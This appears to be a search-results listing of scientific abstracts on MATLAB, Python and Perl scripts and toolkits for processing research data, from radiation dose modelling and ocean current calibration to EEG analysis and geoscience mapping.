Purpose: To implement full/half bowtie filter models in a commercial treatment planning system (TPS) to calculate kilovoltage (kV) x-ray imaging dose of Varian On-Board Imager (OBI) cone beam CT (CBCT) system. Methods: Full/half bowtie filters of Varian OBI were created as compensator models in Pinnacle TPS (version 9.6) using Matlab software (version 2011a). The profiles of both bowtie filters were acquired from the manufacturer, imported into the Matlab system and hard coded in binary file format. A Pinnacle script was written to import each bowtie filter data into a Pinnacle treatment plan as a compensator. A kV x-ray beam modelmore » without including the compensator model was commissioned per each bowtie filter setting based on percent depth dose and lateral profile data acquired from Monte Carlo simulations. To validate the bowtie filter models, a rectangular water phantom was generated in the planning system and an anterior/posterior beam with each bowtie filter was created. Using the Pinnacle script, each bowtie filter compensator was added to the treatment plan. Lateral profile at the depth of 3cm and percent depth dose were measured using an ion chamber and compared with the data extracted from the treatment plans. Results: The kV x-ray beams for both full and half bowtie filter have been modeled in a commercial TPS. The difference of lateral and depth dose profiles between dose calculations and ion chamber measurements were within 6%. Conclusion: Both full/half bowtie filter models provide reasonable results in kV x-ray dose calculations in the water phantom. This study demonstrates the possibility of using a model-based treatment planning system to calculate the kV imaging dose for both full and half bowtie filter modes. Further study is to be performed to evaluate the models in clinical situations.« less
Obtaining and processing Daymet data using Python and ArcGIS
Bohms, Stefanie
2013-01-01
This set of scripts was developed to automate the process of downloading and mosaicking daily Daymet data to a user defined extent using ArcGIS and Python programming language. The three steps are downloading the needed Daymet tiles for the study area extent, converting the netcdf file to a tif raster format, and mosaicking those rasters to one file. The set of scripts is intended for all levels of experience with Python programming language and requires no scripting by the user.
Vessel-Mounted ADCP Data Calibration and Correction
NASA Astrophysics Data System (ADS)
de Andrade, A. F.; Barreira, L. M.; Violante-Carvalho, N.
2013-05-01
A set of scripts for vessel-mounted ADCP (Acoustic Doppler Current Profiler) data processing is presented. The need for corrections in the data measured by a ship-mounted ADCP and the complexities found during installation, implementation and identification of tasks performed by currently available systems for data processing consist the main motivating factors for the development of a system that would be more practical in manipulation, open code and more manageable for the user. The proposed processing system consists of a set of scripts developed in Matlab TM programming language. The system is able to read the binary files provided by the data acquisition program VMDAS (Vessel Mounted Data Acquisition System), Teledyne RDInstruments proprietary, and calculate calibration factors to correct the data and visualize them after correction. For use the new system, it is only necessary that the ADCP data collected with VMDAS program is in a processing diretory and Matlab TM software be installed on the user's computer. Developed algorithms were extensively tested with ADCP data obtained during Oceano Sul III (Southern Ocean III - OSIII) cruise, conducted by Brazilian Navy aboard the R/V "Antares", from March 26th to May 10th 2007, in the oceanic region between the states of São Paulo and Rio Grande do Sul. For read the data the function rdradcp.m, developed by Rich Pawlowicz and available on his website (http://www.eos.ubc.ca/~rich/#RDADCP), was used. To calculate the calibration factors, alignment error (α) and sensitivity error (β) in Water Tracking and Bottom Tracking Modes, equations deduced by Joyce (1998), Pollard & Read (1989) and Trump & Marmorino (1996) were implemented in Matlab. To validate the calibration factors obtained in the processing system developed, the parameters were compared with the factors provided by CODAS (Common Ocean Data Access System, available at http://currents.soest.hawaii.edu/docs/doc/index.html), post-processing program. For the same data analyzed, the factors provided by both systems were similar. Thereafter, the values obtained were used to correct the data and finally matrices were saved with data corrected and they can be plotted. The values of volume transport of the Brazil Current (BC) were calculated using the corrected data by the two systems and proved quite close, confirming the quality of the correction of the system.
NASA Astrophysics Data System (ADS)
Larour, Eric; Cheng, Daniel; Perez, Gilberto; Quinn, Justin; Morlighem, Mathieu; Duong, Bao; Nguyen, Lan; Petrie, Kit; Harounian, Silva; Halkides, Daria; Hayes, Wayne
2017-12-01
Earth system models (ESMs) are becoming increasingly complex, requiring extensive knowledge and experience to deploy and use in an efficient manner. They run on high-performance architectures that are significantly different from the everyday environments that scientists use to pre- and post-process results (i.e., MATLAB, Python). This results in models that are hard to use for non-specialists and are increasingly specific in their application. It also makes them relatively inaccessible to the wider science community, not to mention to the general public. Here, we present a new software/model paradigm that attempts to bridge the gap between the science community and the complexity of ESMs by developing a new JavaScript application program interface (API) for the Ice Sheet System Model (ISSM). The aforementioned API allows cryosphere scientists to run ISSM on the client side of a web page within the JavaScript environment. When combined with a web server running ISSM (using a Python API), it enables the serving of ISSM computations in an easy and straightforward way. The deep integration and similarities between all the APIs in ISSM (MATLAB, Python, and now JavaScript) significantly shortens and simplifies the turnaround of state-of-the-art science runs and their use by the larger community. We demonstrate our approach via a new Virtual Earth System Laboratory (VESL) website (http://vesl.jpl.nasa.gov, VESL(2017)).
DOE Office of Scientific and Technical Information (OSTI.GOV)
Jiang, Zhang
GIXSGUIis a MATLAB toolbox that offers both a graphical user interface and script-based access to visualize and process grazing-incidence X-ray scattering data from nanostructures on surfaces and in thin films. It provides routine surface scattering data reduction methods such as geometric correction, one-dimensional intensity linecut, two-dimensional intensity reshapingetc. Three-dimensional indexing is also implemented to determine the space group and lattice parameters of buried organized nanoscopic structures in supported thin films.
ERPLAB: an open-source toolbox for the analysis of event-related potentials
Lopez-Calderon, Javier; Luck, Steven J.
2014-01-01
ERPLAB toolbox is a freely available, open-source toolbox for processing and analyzing event-related potential (ERP) data in the MATLAB environment. ERPLAB is closely integrated with EEGLAB, a popular open-source toolbox that provides many EEG preprocessing steps and an excellent user interface design. ERPLAB adds to EEGLAB’s EEG processing functions, providing additional tools for filtering, artifact detection, re-referencing, and sorting of events, among others. ERPLAB also provides robust tools for averaging EEG segments together to create averaged ERPs, for creating difference waves and other recombinations of ERP waveforms through algebraic expressions, for filtering and re-referencing the averaged ERPs, for plotting ERP waveforms and scalp maps, and for quantifying several types of amplitudes and latencies. ERPLAB’s tools can be accessed either from an easy-to-learn graphical user interface or from MATLAB scripts, and a command history function makes it easy for users with no programming experience to write scripts. Consequently, ERPLAB provides both ease of use and virtually unlimited power and flexibility, making it appropriate for the analysis of both simple and complex ERP experiments. Several forms of documentation are available, including a detailed user’s guide, a step-by-step tutorial, a scripting guide, and a set of video-based demonstrations. PMID:24782741
ERPLAB: an open-source toolbox for the analysis of event-related potentials.
Lopez-Calderon, Javier; Luck, Steven J
2014-01-01
ERPLAB toolbox is a freely available, open-source toolbox for processing and analyzing event-related potential (ERP) data in the MATLAB environment. ERPLAB is closely integrated with EEGLAB, a popular open-source toolbox that provides many EEG preprocessing steps and an excellent user interface design. ERPLAB adds to EEGLAB's EEG processing functions, providing additional tools for filtering, artifact detection, re-referencing, and sorting of events, among others. ERPLAB also provides robust tools for averaging EEG segments together to create averaged ERPs, for creating difference waves and other recombinations of ERP waveforms through algebraic expressions, for filtering and re-referencing the averaged ERPs, for plotting ERP waveforms and scalp maps, and for quantifying several types of amplitudes and latencies. ERPLAB's tools can be accessed either from an easy-to-learn graphical user interface or from MATLAB scripts, and a command history function makes it easy for users with no programming experience to write scripts. Consequently, ERPLAB provides both ease of use and virtually unlimited power and flexibility, making it appropriate for the analysis of both simple and complex ERP experiments. Several forms of documentation are available, including a detailed user's guide, a step-by-step tutorial, a scripting guide, and a set of video-based demonstrations.
Formatting scripts with computers and Extended BASIC.
Menning, C B
1984-02-01
A computer program, written in the language of Extended BASIC, is presented which enables scripts, for educational media, to be quickly written in a nearly unformatted style. From the resulting script file, stored on magnetic tape or disk, the computer program formats the script into either a storyboard , a presentation, or a narrator 's script. Script headings and page and paragraph numbers are automatic features in the word processing. Suggestions are given for making personal modifications to the computer program.
Modules based on the geochemical model PHREEQC for use in scripting and programming languages
Charlton, Scott R.; Parkhurst, David L.
2011-01-01
The geochemical model PHREEQC is capable of simulating a wide range of equilibrium reactions between water and minerals, ion exchangers, surface complexes, solid solutions, and gases. It also has a general kinetic formulation that allows modeling of nonequilibrium mineral dissolution and precipitation, microbial reactions, decomposition of organic compounds, and other kinetic reactions. To facilitate use of these reaction capabilities in scripting languages and other models, PHREEQC has been implemented in modules that easily interface with other software. A Microsoft COM (component object model) has been implemented, which allows PHREEQC to be used by any software that can interface with a COM server—for example, Excel®, Visual Basic®, Python, or MATLAB". PHREEQC has been converted to a C++ class, which can be included in programs written in C++. The class also has been compiled in libraries for Linux and Windows that allow PHREEQC to be called from C++, C, and Fortran. A limited set of methods implements the full reaction capabilities of PHREEQC for each module. Input methods use strings or files to define reaction calculations in exactly the same formats used by PHREEQC. Output methods provide a table of user-selected model results, such as concentrations, activities, saturation indices, and densities. The PHREEQC module can add geochemical reaction capabilities to surface-water, groundwater, and watershed transport models. It is possible to store and manipulate solution compositions and reaction information for many cells within the module. In addition, the object-oriented nature of the PHREEQC modules simplifies implementation of parallel processing for reactive-transport models. The PHREEQC COM module may be used in scripting languages to fit parameters; to plot PHREEQC results for field, laboratory, or theoretical investigations; or to develop new models that include simple or complex geochemical calculations.
Modules based on the geochemical model PHREEQC for use in scripting and programming languages
Charlton, S.R.; Parkhurst, D.L.
2011-01-01
The geochemical model PHREEQC is capable of simulating a wide range of equilibrium reactions between water and minerals, ion exchangers, surface complexes, solid solutions, and gases. It also has a general kinetic formulation that allows modeling of nonequilibrium mineral dissolution and precipitation, microbial reactions, decomposition of organic compounds, and other kinetic reactions. To facilitate use of these reaction capabilities in scripting languages and other models, PHREEQC has been implemented in modules that easily interface with other software. A Microsoft COM (component object model) has been implemented, which allows PHREEQC to be used by any software that can interface with a COM server-for example, Excel??, Visual Basic??, Python, or MATLAB??. PHREEQC has been converted to a C++ class, which can be included in programs written in C++. The class also has been compiled in libraries for Linux and Windows that allow PHREEQC to be called from C++, C, and Fortran. A limited set of methods implements the full reaction capabilities of PHREEQC for each module. Input methods use strings or files to define reaction calculations in exactly the same formats used by PHREEQC. Output methods provide a table of user-selected model results, such as concentrations, activities, saturation indices, and densities. The PHREEQC module can add geochemical reaction capabilities to surface-water, groundwater, and watershed transport models. It is possible to store and manipulate solution compositions and reaction information for many cells within the module. In addition, the object-oriented nature of the PHREEQC modules simplifies implementation of parallel processing for reactive-transport models. The PHREEQC COM module may be used in scripting languages to fit parameters; to plot PHREEQC results for field, laboratory, or theoretical investigations; or to develop new models that include simple or complex geochemical calculations. ?? 2011.
Accounting Data to Web Interface Using PERL
DOE Office of Scientific and Technical Information (OSTI.GOV)
Hargeaves, C
2001-08-13
This document will explain the process to create a web interface for the accounting information generated by the High Performance Storage Systems (HPSS) accounting report feature. The accounting report contains useful data but it is not easily accessed in a meaningful way. The accounting report is the only way to see summarized storage usage information. The first step is to take the accounting data, make it meaningful and store the modified data in persistent databases. The second step is to generate the various user interfaces, HTML pages, that will be used to access the data. The third step is tomore » transfer all required files to the web server. The web pages pass parameters to Common Gateway Interface (CGI) scripts that generate dynamic web pages and graphs. The end result is a web page with specific information presented in text with or without graphs. The accounting report has a specific format that allows the use of regular expressions to verify if a line is storage data. Each storage data line is stored in a detailed database file with a name that includes the run date. The detailed database is used to create a summarized database file that also uses run date in its name. The summarized database is used to create the group.html web page that includes a list of all storage users. Scripts that query the database folder to build a list of available databases generate two additional web pages. A master script that is run monthly as part of a cron job, after the accounting report has completed, manages all of these individual scripts. All scripts are written in the PERL programming language. Whenever possible data manipulation scripts are written as filters. All scripts are written to be single source, which means they will function properly on both the open and closed networks at LLNL. The master script handles the command line inputs for all scripts, file transfers to the web server and records run information in a log file. The rest of the scripts manipulate the accounting data or use the files created to generate HTML pages. Each script will be described in detail herein. The following is a brief description of HPSS taken directly from an HPSS web site. ''HPSS is a major development project, which began in 1993 as a Cooperative Research and Development Agreement (CRADA) between government and industry. The primary objective of HPSS is to move very large data objects between high performance computers, workstation clusters, and storage libraries at speeds many times faster than is possible with today's software systems. For example, HPSS can manage parallel data transfers from multiple network-connected disk arrays at rates greater than 1 Gbyte per second, making it possible to access high definition digitized video in real time.'' The HPSS accounting report is a canned report whose format is controlled by the HPSS developers.« less
NASA Astrophysics Data System (ADS)
Verkaik, J.
2013-12-01
The Netherlands Hydrological Instrument (NHI) model predicts water demands in periods of drought, supporting the Dutch decision makers in taking operational as well as long-term decisions with respect to the water supply. Other applications of NHI are predicting fresh-salt interaction, nutrient loadings, and agriculture change. The NHI model consists of several coupled models: a saturated groundwater model (MODFLOW), an unsaturated groundwater model (MetaSWAP), a sub-catchment surface water model (MOZART), and a distribution network of surface waters model (DM/SOBEK). Each of these models requires specific, usually large, input data that may be the result of sophisticated schematization workflows. Input data can also be dependent on each other, for example, the precipitation data is input for the unsaturated zone model (cells) as well as for the surface water models (polygons). For efficient data management, we developed several Python tools such that the modeler or stakeholder can use the model in a user-friendly manner, and data is managed in a consistent, transparent and reproducible way. Two open source Python tools are presented here: the data version control module for the workflow manager VisTrails called FileSync, and the NHI model control script that uses FileSync. VisTrails is an open-source scientific workflow and provenance management system that provides support for simulations, data exploration and visualization. Since VisTrails does not directly support version control we developed a version control module called FileSync. With this generic module, the user can synchronize data from and to his workflow through a dialog window. The FileSync dialog calls the FileSync script that is command-line based and performs the actual data synchronization. This script allows the user to easily create a model repository, upload and download data, create releases and define scenarios. The data synchronization approach applied here differs from systems as Subversion or Git, since these systems do not perform well for large (binary) model data files. For this reason, a new concept of parameterization and data splitting has been implemented. Each file, or set of files, is uniquely labeled as a parameter, and for this parameter metadata is maintained by Subversion. The metadata data contains file hashes to identify data content and the location where the actual bulk data are stored that can be reached by FTP. The NHI model control script is a command-line driven Python script for pre-processing, running, and post-processing the NHI model and uses one single configuration file for all computational kernels. This configuration file is an easy-to-use, keyword-driven, Windows INI-file, having separate sections for all the kernels. It also includes a FileSync data section where the user can specify version controlled model data to be used as input. The NHI control script keeps all the data consistent during the pre-processing. Furthermore, this script is able to do model state handling when the NHI model is used for ensemble forecasting.
AutoMicromanager: A microscopy scripting toolkit for LABVIEW and other programming environments
NASA Astrophysics Data System (ADS)
Ashcroft, Brian Alan; Oosterkamp, Tjerk
2010-11-01
We present a scripting toolkit for the acquisition and analysis of a wide variety of imaging data by integrating the ease of use of various programming environments such as LABVIEW, IGOR PRO, MATLAB, SCILAB, and others. This toolkit is designed to allow the user to quickly program a variety of standard microscopy components for custom microscopy applications allowing much more flexibility than other packages. Included are both programming tools as well as graphical user interface classes allowing a standard, consistent, and easy to maintain scripting environment. This programming toolkit allows easy access to most commonly used cameras, stages, and shutters through the Micromanager project so the scripter can focus on their custom application instead of boilerplate code generation.
AutoMicromanager: a microscopy scripting toolkit for LABVIEW and other programming environments.
Ashcroft, Brian Alan; Oosterkamp, Tjerk
2010-11-01
We present a scripting toolkit for the acquisition and analysis of a wide variety of imaging data by integrating the ease of use of various programming environments such as LABVIEW, IGOR PRO, MATLAB, SCILAB, and others. This toolkit is designed to allow the user to quickly program a variety of standard microscopy components for custom microscopy applications allowing much more flexibility than other packages. Included are both programming tools as well as graphical user interface classes allowing a standard, consistent, and easy to maintain scripting environment. This programming toolkit allows easy access to most commonly used cameras, stages, and shutters through the Micromanager project so the scripter can focus on their custom application instead of boilerplate code generation.
The Generic Mapping Tools 6: Classic versus Modern Mode
NASA Astrophysics Data System (ADS)
Wessel, P.; Uieda, L.; Luis, J. M. F.; Scharroo, R.; Smith, W. H. F.; Wobbe, F.
2017-12-01
The Generic Mapping Tools (GMT; gmt.soest.hawaii.edu) is a 25-year old, mature open-source software package for the analysis and display of geoscience data (e.g., interpolate, filter, manipulate, project and plot temporal and spatial data). The GMT "toolbox" includes about 80 core and 40 supplemental modules sharing a common set of command options, file structures, and documentation. GMT5, when released in 2013, introduced an application programming interface (API) to allow programmatic access to GMT from other computing environments. Since then, we have released a GMT/MATLAB toolbox, an experimental GMT/Julia package, and will soon introduce a GMT/Python module. In developing these extensions, we wanted to simplify the GMT learning curve but quickly realized the main stumbling blocks to GMT command-line mastery would be ported to the external environments unless we introduced major changes. With thousands of GMT scripts already in use by scientists around the world, we were acutely aware of the need for backwards compatibility. Our solution, to be released as GMT 6, was to add a modern run mode that complements the classic mode offered so far. Modern mode completely eliminates the top three obstacles for new (and not so new) GMT users: (1) The responsibility to properly stack PostScript layers manually (i.e., the -O -K dance), (2) the responsibility of handling output redirection of PostScript (create versus append), and (3) the need to provide commands with repeated information about regions (-R) and projections (-J). Thus, modern mode results in shorter, simpler scripts with fewer pitfalls, without interfering with classic scripts. Our implementation adds five new commands that begin and end a modern session, simplify figure management, automate the conversion of PostScript to more suitable formats, automate region detection, and offer a new automated subplot environment for multi-panel illustrations. Here, we highlight the GMT modern mode and the simplifications it offers, both for command-line use and in external environments. GMT 6 is in beta mode but accessible from our repository. Numerous improvements have been added in addition to modern mode; we expect a formal release in early 2018. Publication partially supported by FCT project UID/GEO/50019/2013 - Instituto D. Luiz.
Automation of the CFD Process on Distributed Computing Systems
NASA Technical Reports Server (NTRS)
Tejnil, Ed; Gee, Ken; Rizk, Yehia M.
2000-01-01
A script system was developed to automate and streamline portions of the CFD process. The system was designed to facilitate the use of CFD flow solvers on supercomputer and workstation platforms within a parametric design event. Integrating solver pre- and postprocessing phases, the fully automated ADTT script system marshalled the required input data, submitted the jobs to available computational resources, and processed the resulting output data. A number of codes were incorporated into the script system, which itself was part of a larger integrated design environment software package. The IDE and scripts were used in a design event involving a wind tunnel test. This experience highlighted the need for efficient data and resource management in all parts of the CFD process. To facilitate the use of CFD methods to perform parametric design studies, the script system was developed using UNIX shell and Perl languages. The goal of the work was to minimize the user interaction required to generate the data necessary to fill a parametric design space. The scripts wrote out the required input files for the user-specified flow solver, transferred all necessary input files to the computational resource, submitted and tracked the jobs using the resource queuing structure, and retrieved and post-processed the resulting dataset. For computational resources that did not run queueing software, the script system established its own simple first-in-first-out queueing structure to manage the workload. A variety of flow solvers were incorporated in the script system, including INS2D, PMARC, TIGER and GASP. Adapting the script system to a new flow solver was made easier through the use of object-oriented programming methods. The script system was incorporated into an ADTT integrated design environment and evaluated as part of a wind tunnel experiment. The system successfully generated the data required to fill the desired parametric design space. This stressed the computational resources required to compute and store the information. The scripts were continually modified to improve the utilization of the computational resources and reduce the likelihood of data loss due to failures. An ad-hoc file server was created to manage the large amount of data being generated as part of the design event. Files were stored and retrieved as needed to create new jobs and analyze the results. Additional information is contained in the original.
Robichaud, Guillaume; Garrard, Kenneth P; Barry, Jeremy A; Muddiman, David C
2013-05-01
During the past decade, the field of mass spectrometry imaging (MSI) has greatly evolved, to a point where it has now been fully integrated by most vendors as an optional or dedicated platform that can be purchased with their instruments. However, the technology is not mature and multiple research groups in both academia and industry are still very actively studying the fundamentals of imaging techniques, adapting the technology to new ionization sources, and developing new applications. As a result, there important varieties of data file formats used to store mass spectrometry imaging data and, concurrent to the development of MSi, collaborative efforts have been undertaken to introduce common imaging data file formats. However, few free software packages to read and analyze files of these different formats are readily available. We introduce here MSiReader, a free open source application to read and analyze high resolution MSI data from the most common MSi data formats. The application is built on the Matlab platform (Mathworks, Natick, MA, USA) and includes a large selection of data analysis tools and features. People who are unfamiliar with the Matlab language will have little difficult navigating the user-friendly interface, and users with Matlab programming experience can adapt and customize MSiReader for their own needs.
NASA Astrophysics Data System (ADS)
Robichaud, Guillaume; Garrard, Kenneth P.; Barry, Jeremy A.; Muddiman, David C.
2013-05-01
During the past decade, the field of mass spectrometry imaging (MSI) has greatly evolved, to a point where it has now been fully integrated by most vendors as an optional or dedicated platform that can be purchased with their instruments. However, the technology is not mature and multiple research groups in both academia and industry are still very actively studying the fundamentals of imaging techniques, adapting the technology to new ionization sources, and developing new applications. As a result, there important varieties of data file formats used to store mass spectrometry imaging data and, concurrent to the development of MSi, collaborative efforts have been undertaken to introduce common imaging data file formats. However, few free software packages to read and analyze files of these different formats are readily available. We introduce here MSiReader, a free open source application to read and analyze high resolution MSI data from the most common MSi data formats. The application is built on the Matlab platform (Mathworks, Natick, MA, USA) and includes a large selection of data analysis tools and features. People who are unfamiliar with the Matlab language will have little difficult navigating the user-friendly interface, and users with Matlab programming experience can adapt and customize MSiReader for their own needs.
Extracting the Data From the LCM vk4 Formatted Output File
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wendelberger, James G.
These are slides about extracting the data from the LCM vk4 formatted output file. The following is covered: vk4 file produced by Keyence VK Software, custom analysis, no off the shelf way to read the file, reading the binary data in a vk4 file, various offsets in decimal lines, finding the height image data, directly in MATLAB, binary output beginning of height image data, color image information, color image binary data, color image decimal and binary data, MATLAB code to read vk4 file (choose a file, read the file, compute offsets, read optical image, laser optical image, read and computemore » laser intensity image, read height image, timing, display height image, display laser intensity image, display RGB laser optical images, display RGB optical images, display beginning data and save images to workspace, gamma correction subroutine), reading intensity form the vk4 file, linear in the low range, linear in the high range, gamma correction for vk4 files, computing the gamma intensity correction, observations.« less
Quantum propagation and confinement in 1D systems using the transfer-matrix method
NASA Astrophysics Data System (ADS)
Pujol, Olivier; Carles, Robert; Pérez, José-Philippe
2014-05-01
The aim of this article is to provide some Matlab scripts to the teaching community in quantum physics. The scripts are based on the transfer-matrix formalism and offer a very efficient and versatile tool to solve problems of a physical object (electron, proton, neutron, etc) with one-dimensional (1D) stationary potential energy. Resonant tunnelling through a multiple-barrier or confinement in wells of various shapes is particularly analysed. The results are quantitatively discussed with semiconductor heterostructures, harmonic and anharmonic molecular vibrations, or neutrons in a gravity field. Scripts and other examples (hydrogen-like ions and transmission by a smooth variation of potential energy) are available freely at http://www-loa.univ-lille1.fr/˜pujol in three languages: English, French and Spanish.
Aerobraking Maneuver (ABM) Report Generator
NASA Technical Reports Server (NTRS)
Fisher, Forrest; Gladden, Roy; Khanampornpan, Teerapat
2008-01-01
abmREPORT Version 3.1 is a Perl script that extracts vital summarization information from the Mars Reconnaissance Orbiter (MRO) aerobraking ABM build process. This information facilitates sequence reviews, and provides a high-level summarization of the sequence for mission management. The script extracts information from the ENV, SSF, FRF, SCMFmax, and OPTG files and burn magnitude configuration files and presents them in a single, easy-to-check report that provides the majority of the parameters necessary for cross check and verification during the sequence review process. This means that needed information, formerly spread across a number of different files and each in a different format, is all available in this one application. This program is built on the capabilities developed in dragReport and then the scripts evolved as the two tools continued to be developed in parallel.
DSISoft—a MATLAB VSP data processing package
NASA Astrophysics Data System (ADS)
Beaty, K. S.; Perron, G.; Kay, I.; Adam, E.
2002-05-01
DSISoft is a public domain vertical seismic profile processing software package developed at the Geological Survey of Canada. DSISoft runs under MATLAB version 5.0 and above and hence is portable between computer operating systems supported by MATLAB (i.e. Unix, Windows, Macintosh, Linux). The package includes processing modules for reading and writing various standard seismic data formats, performing data editing, sorting, filtering, and other basic processing modules. The processing sequence can be scripted allowing batch processing and easy documentation. A structured format has been developed to ensure future additions to the package are compatible with existing modules. Interactive modules have been created using MATLAB's graphical user interface builder for displaying seismic data, picking first break times, examining frequency spectra, doing f- k filtering, and plotting the trace header information. DSISoft modular design facilitates the incorporation of new processing algorithms as they are developed. This paper gives an overview of the scope of the software and serves as a guide for the addition of new modules.
USDA-ARS?s Scientific Manuscript database
A rapid computer-aided program for profiling glucosinolates, “GLS-Finder", was developed. GLS-Finder is a Matlab script based expert system that is capable for qualitative and semi-quantitative analysis of glucosinolates in samples using data generated by ultra-high performance liquid chromatograph...
RivGen, Igiugig Deployment, Control System Specifications and Models
Forbush, Dominic; Cavagnaro, Robert J.; Guerra, Maricarmen; Donegan, James; McEntee, Jarlath; Thomson, Jim; Polagye, Brian; Fabien, Brian; Kilcher, Levi
2016-03-21
Control System simulation models, case studies, and processing codes for analyzing field data. Raw data files included from VFD and SCADA. MatLab and Simulink are required to open some data files and all model files.
A modeling paradigm for interdisciplinary water resources modeling: Simple Script Wrappers (SSW)
NASA Astrophysics Data System (ADS)
Steward, David R.; Bulatewicz, Tom; Aistrup, Joseph A.; Andresen, Daniel; Bernard, Eric A.; Kulcsar, Laszlo; Peterson, Jeffrey M.; Staggenborg, Scott A.; Welch, Stephen M.
2014-05-01
Holistic understanding of a water resources system requires tools capable of model integration. This team has developed an adaptation of the OpenMI (Open Modelling Interface) that allows easy interactions across the data passed between models. Capabilities have been developed to allow programs written in common languages such as matlab, python and scilab to share their data with other programs and accept other program's data. We call this interface the Simple Script Wrapper (SSW). An implementation of SSW is shown that integrates groundwater, economic, and agricultural models in the High Plains region of Kansas. Output from these models illustrates the interdisciplinary discovery facilitated through use of SSW implemented models. Reference: Bulatewicz, T., A. Allen, J.M. Peterson, S. Staggenborg, S.M. Welch, and D.R. Steward, The Simple Script Wrapper for OpenMI: Enabling interdisciplinary modeling studies, Environmental Modelling & Software, 39, 283-294, 2013. http://dx.doi.org/10.1016/j.envsoft.2012.07.006 http://code.google.com/p/simple-script-wrapper/
NASA Technical Reports Server (NTRS)
Soileau, Kerry M.; Baicy, John W.
2008-01-01
Rig Diagnostic Tools is a suite of applications designed to allow an operator to monitor the status and health of complex networked systems using a unique interface between Java applications and UNIX scripts. The suite consists of Java applications, C scripts, Vx- Works applications, UNIX utilities, C programs, and configuration files. The UNIX scripts retrieve data from the system and write them to a certain set of files. The Java side monitors these files and presents the data in user-friendly formats for operators to use in making troubleshooting decisions. This design allows for rapid prototyping and expansion of higher-level displays without affecting the basic data-gathering applications. The suite is designed to be extensible, with the ability to add new system components in building block fashion without affecting existing system applications. This allows for monitoring of complex systems for which unplanned shutdown time comes at a prohibitive cost.
JavaScript: Convenient Interactivity for the Class Web Page.
ERIC Educational Resources Information Center
Gray, Patricia
This paper shows how JavaScript can be used within HTML pages to add interactive review sessions and quizzes incorporating graphics and sound files. JavaScript has the advantage of providing basic interactive functions without the use of separate software applications and players. Because it can be part of a standard HTML page, it is…
Messier, Erik
2016-08-01
A Multichannel Systems (MCS) microelectrode array data acquisition (DAQ) unit is used to collect multichannel electrograms (EGM) from a Langendorff perfused rabbit heart system to study sudden cardiac death (SCD). MCS provides software through which data being processed by the DAQ unit can be displayed and saved, but this software's combined utility with MATLAB is not very effective. MCSs software stores recorded EGM data in a MathCad (MCD) format, which is then converted to a text file format. These text files are very large, and it is therefore very time consuming to import the EGM data into MATLAB for real-time analysis. Therefore, customized MATLAB software was developed to control the acquisition of data from the MCS DAQ unit, and provide specific laboratory accommodations for this study of SCD. The developed DAQ unit control software will be able to accurately: provide real time display of EGM signals; record and save EGM signals in MATLAB in a desired format; and produce real time analysis of the EGM signals; all through an intuitive GUI.
Documenting AUTOGEN and APGEN Model Files
NASA Technical Reports Server (NTRS)
Gladden, Roy E.; Khanampompan, Teerapat; Fisher, Forest W.; DelGuericio, Chris c.
2008-01-01
A computer program called "autogen hypertext map generator" satisfies a need for documenting and assisting in visualization of, and navigation through, model files used in the AUTOGEN and APGEN software mentioned in the two immediately preceding articles. This program parses autogen script files, autogen model files, PERL scripts, and apgen activity-definition files and produces a hypertext map of the files to aid in the navigation of the model. This program also provides a facility for adding notes and descriptions, beyond what is in the source model represented by the hypertext map. Further, this program provides access to a summary of the model through variable, function, sub routine, activity and resource declarations as well as providing full access to the source model and source code. The use of the tool enables easy access to the declarations and the ability to traverse routines and calls while analyzing the model.
2018-01-18
processing. Specifically, the method described herein uses wgrib2 commands along with a Python script or program to produce tabular text files that in...It makes use of software that is readily available and can be implemented on many computer systems combined with relatively modest additional...example), extracts appropriate information, and lists the extracted information in a readable tabular form. The Python script used here is described in
Fundamentals of Structural Geology
NASA Astrophysics Data System (ADS)
Pollard, David D.; Fletcher, Raymond C.
2005-09-01
Fundamentals of Structural Geology provides a new framework for the investigation of geological structures by integrating field mapping and mechanical analysis. Assuming a basic knowledge of physical geology, introductory calculus and physics, it emphasizes the observational data, modern mapping technology, principles of continuum mechanics, and the mathematical and computational skills, necessary to quantitatively map, describe, model, and explain deformation in Earth's lithosphere. By starting from the fundamental conservation laws of mass and momentum, the constitutive laws of material behavior, and the kinematic relationships for strain and rate of deformation, the authors demonstrate the relevance of solid and fluid mechanics to structural geology. This book offers a modern quantitative approach to structural geology for advanced students and researchers in structural geology and tectonics. It is supported by a website hosting images from the book, additional colour images, student exercises and MATLAB scripts. Solutions to the exercises are available to instructors. The book integrates field mapping using modern technology with the analysis of structures based on a complete mechanics MATLAB is used to visualize physical fields and analytical results and MATLAB scripts can be downloaded from the website to recreate textbook graphics and enable students to explore their choice of parameters and boundary conditions The supplementary website hosts color images of outcrop photographs used in the text, supplementary color images, and images of textbook figures for classroom presentations The textbook website also includes student exercises designed to instill the fundamental relationships, and to encourage the visualization of the evolution of geological structures; solutions are available to instructors
Batch Proving and Proof Scripting in PVS
NASA Technical Reports Server (NTRS)
Munoz, Cesar A.
2007-01-01
The batch execution modes of PVS are powerful, but highly technical, features of the system that are mostly accessible to expert users. This paper presents a PVS tool, called ProofLite, that extends the theorem prover interface with a batch proving utility and a proof scripting notation. ProofLite enables a semi-literate proving style where specification and proof scripts reside in the same file. The goal of ProofLite is to provide batch proving and proof scripting capabilities to regular, non-expert, users of PVS.
DOE Office of Scientific and Technical Information (OSTI.GOV)
McSpaden, Alexander Thomas
Two Python scripts have been written that process the output files of MCNP6 into a format that mimics the list-mode output of Los Alamos National Laboratory’s MC-15 and NPOD neutron detection systems. This report details the methods implemented in these scripts and instructions on their use.
Butensky, Samuel D; Sloan, Andrew P; Meyers, Eric; Carmel, Jason B
2017-07-15
Hand function is critical for independence, and neurological injury often impairs dexterity. To measure hand function in people or forelimb function in animals, sensors are employed to quantify manipulation. These sensors make assessment easier and more quantitative and allow automation of these tasks. While automated tasks improve objectivity and throughput, they also produce large amounts of data that can be burdensome to analyze. We created software called Dexterity that simplifies data analysis of automated reaching tasks. Dexterity is MATLAB software that enables quick analysis of data from forelimb tasks. Through a graphical user interface, files are loaded and data are identified and analyzed. These data can be annotated or graphed directly. Analysis is saved, and the graph and corresponding data can be exported. For additional analysis, Dexterity provides access to custom scripts created by other users. To determine the utility of Dexterity, we performed a study to evaluate the effects of task difficulty on the degree of impairment after injury. Dexterity analyzed two months of data and allowed new users to annotate the experiment, visualize results, and save and export data easily. Previous analysis of tasks was performed with custom data analysis, requiring expertise with analysis software. Dexterity made the tools required to analyze, visualize and annotate data easy to use by investigators without data science experience. Dexterity increases accessibility to automated tasks that measure dexterity by making analysis of large data intuitive, robust, and efficient. Copyright © 2017 Elsevier 